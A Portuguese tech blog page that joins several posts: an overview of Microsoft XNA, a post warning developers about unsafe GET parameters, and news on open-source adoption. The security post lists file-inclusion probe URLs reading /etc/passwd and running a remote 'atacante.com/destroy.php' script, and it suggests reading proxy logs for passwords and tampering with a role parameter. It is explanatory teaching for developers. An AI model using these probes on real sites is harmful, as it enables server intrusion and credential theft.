World Of Bit

Sempre fui muito fã de games ainda mais para o PC com isso surgiu a curiosidade de entender como funciona nos bastidores o seu funcionamento.
Aqui irei passar um pouco sobre a plataforma de desenvolvimento de games da Microsoft que é utilizada tanto PC quanto para X360.

O que é XNA?

Microsoft XNA é uma Framework, que serve tanto para criar jogos para PCs com Windows, como para o console Xbox 360. Ele vem ser um substituto ao Managed DirectX. A sigla XNA significa XNA's Not Acronymed.

Descrição:

O XNA, por ser uma plataforma de desenvolvimento, é formada por alguns componentes descritos à seguir:

XNA Game Studio: IDE de desenvolvimento, baseado no Visual C# Studio. Assim, até o momento, só é possível desenvolver jogos usando a linguagem orientada à objetos C#. Existem duas versões:

XNA Game Studio Express: versão gratuita e baseada no Visual C# 2005 Express. Ele foi desenvolvido para ser usado por estudantes, desenvolvedores hobbistas e pequenos grupos de desenvolvimento (indie developers), com o intuito de permitir que os usuários desenvolvessem seus próprios videogames;

XNA Game Studio Professional: sem preço definido e data para lançamento ainda;

XNA Framework: conjunto de classes necessárias para se execução de um jogo XNA. Funciona sobre o .NET Framework 2.0 (games para PCs) ou do .NET Compact Framework for Xbox 360 (games para Xbox 360);

XNA Content Pipeline: componente de gerência de conteúdo e artefatos do projeto, tais como imagens (JPG, PNG, BMP, etc), modelos 3D (X, FBX, etc), sonoros (WAV, etc) e dados (XML, etc). Ele transforma os arquivos automaticamente no momento do build em um formato que será entendido pela aplicação em tempo de execução. O Content Pipeline é extensível e permite que o desenvolvedor escreva um conversor para um formato especial ou desconhecido com flexibilidade;

XACT (Audio Authoring Tool): ferramenta para audio designers organizarem seus arquivos de aúdio e efeitos sonoros.
Somente são suportados os formatos WAV e AIF.

Irei abordar nesse post um recurso que é muito utilizado em sites e aplicativos web, que é a passagem de parâmetros via GET (na URL).

Sempre vejo em sites esse recurso sendo utilizado de forma incorreta, dando brecha para que usuários com "segundas" intenções ganhem acesso ao servidor.
- Mas como?
Vejamos dois exemplos de URL que podem gerar um problemão:

1. http://sitecombrecha.com/index.php?pagina=home.php
2. http://sitecombrecha.com/login.php?usuario=fulano&senha=abcd1234&perfil=cliente

Na primeira URL o desenvolvedor chama as páginas do site por meio de um include no nome do arquivo que é passado como parâmetro na URL.
Isso possibilita que o atacante consiga visualizar qualquer arquivo do servidor (Desde que o usuário do deamon do web server tenha acesso).
Exemplo para testar a falha:

• http://sitecombrecha.com/index.php?pagina=/etc/fstab
• http://sitecombrecha.com/index.php?pagina=/etc/passwd
• http://sitecombrecha.com/index.php?pagina=/var/log/messages

Se no php.ini a opção allow_url_fopen estiver habilitada, é possível executar arquivos externos da seguinte maneira:

• http://sitecombrecha.com/index.php?pagina=http://atacante.com/destroy.php
• http://sitecombrecha.com/index.php?pagina=ftp://atacante.com/public/destroy.php

O php permite que funções como include, include_once, require, require_once e fopen façam referencias para URL's desde que a opção allow_url_fopen esteja habilitada no php.ini.
Para que o script destroy.php do atacante tenha efeito, o servidor web do atacante não deve interpretar o script php, pois senão o script será executado no servidor do atacante.

Na segunda URL estão sendo passados dados sensíveis para a aplicação, que é o login e senha do usuário. Nesse caso o login e senha do usuário podem ficar gravados no histórico do navegador ou no log do proxy.
Se você fizer um formulário de login em HTML e esquecer de colocar method="post" na tag form ou a escrever errado, por default (w3c) o navegador irá entender method="get", e os dados do login irão passar via GET!!!
Exemplo: Dá uma olhada no histórico do navegador de uma LanHouse, ou dá uma olhada no log do proxy dessa LanHouse. É impressionante a quantidade de sistemas e sites que funcionam dessa forma.
Tabém é possível tentar mudar o parâmetro perfil=cliente para perfil=administrador, quem sabe você não vira adm!.
São pequenas coisas que tornam um sistema vulnerável, e essa foi a minha dica para se pensar mais no que deve ser passado na URL.

Obs.: Esse post foi escrito com o único propósito de exemplificar para desenvolvedores como aplicações podem estar vulneráveis a falhas de segurança.

Fonte: Itatux

Segundo a Computerworld todas as empresas irão adotar software livre em 12 meses, veja a notícia na integra.

Computerworld

Gartner: Código aberto em todas as empresas em no máximo 12 meses

Levantamento do instituto aponta que 85% das empresas já são usuárias de software open source e os 15% restantes vão adotar em 2009. Uma nova pesquisa do Gartner mostrou o ritmo de adoção do software de código aberto no ambiente empresarial. Segundo os dados do instituto, 85% das empresas estão usando código aberto e os 15% restantes devem adotar a tecnologia em um ano.
O levantamento foi feito entre os meses de maio a junho de 2008, ouvindo 274 organizações na região Ásia/Pacifico, Europa e América do Norte.

No entanto, o Gartner disse que 69% das empresas pesquisadas não possuem uma política formal para avaliar e catalogar a utilização de open source. Isso tem "um grande potencial de criar violações de propriedade intelectual", alerta o instituto.

"Apenas por algo ser gratuito, isso não significa que não tenha custo," disse Laurie Wurster, diretor do Gartner.

"As empresas precisam ter políticas para aplicações em código aberto, decidindo quais áreas terão open source e identificando quais são os riscos associados com propriedade intelectual ao usar o open source. Quando as políticas estiverem estabelecidas, é preciso ter um processo de governança para garanti-las." De acordo com o Gartner, o código aberto está sendo instalado de maneira equivalente tanto em ambientes de missão crítica quanto nos que não são críticos. No data center, o open source funciona?

Razões para adotar open source

As três principais razões para adota open source estão relacionadas com o custo total de propriedade (TCO), custo menor para o desenvolvimento e maior facilidade para começar novas iniciativas usando uma base de código aberto.

"Alguns dos entrevistados disseram que eles também utilizam open source para se protegerem de ter apenas um fornecedor que é ‘dono’ de todo o seu departamento de TI," ressaltou o Gartner.
Outros entrevistados disseram que a principal razão de negócios para adotar código aberto estava em um time to market mais rápido para novos produtos e a capacidade de evitar procedimentos e regras de vendas complexas.

Contudo, ter governança no ambiente aberto é o maior desafio para as empresas, seguido pelos termos conflitantes ao ter vários tipos de licenças e formulários.

"Entender quando e como a alternativa aberta deve ser usada é um processo frustrante. Mas essas questões vão ser resolvidas lentamente. A maior popularidade do código aberto vai gerar as mudanças," disse Wurster.

Dúvidas entre qual sistema usar, talvez essa reportagem feita pelo olhar Digital ajude a entender algo que todo mundo já sabe. Ubuntu é o sistema a qual a Microsoft mais tem tido medo, não só pelo fato de já ter acumulado mais de 10 milhões de usuários, isso mesmo mais de 10 milhões de usuários no mundo, mas também por ter opções de aplicações opensource competitivas as aplicações proprietárias para Windows.

Como publicado na Computerworld em 14 abril deste ano e acredito que vale apena relembrar, sete exemplos de idéias de tecnologia que mesmo sendo boas não conseguiram brilhar ou então seguiram por outro caminho.

1. PCs ultracompactos

Ultramobile PCs (UMPC), mobile information devices (MID) ou subnotebooks, são quase indistinguíveis de um bom smart phone. O BlackBerry 8820, por exemplo, com GPS embutido e cliente de e-mail, é um dispositivo melhor do que o Samsung Q1 Ultra.

O Apple iPhone é um computador mais inteligente, empolgante e utilizável do que praticamente qualquer MID, como o novo protótipo da Toshiba. E o OQO tem mais potência do que um UMPC comum, mas a tela é igualmente pequena.

Mesmo os Netbooks tendo hoje uma boa aceitação, ainda não algo de se considerar aceitável perto do que muitas empresas investiram em tecnologia, como por exemplo a Asus com EEPC, tanto os Netbooks como os UMPC ainda não brilharam como era de se imaginar.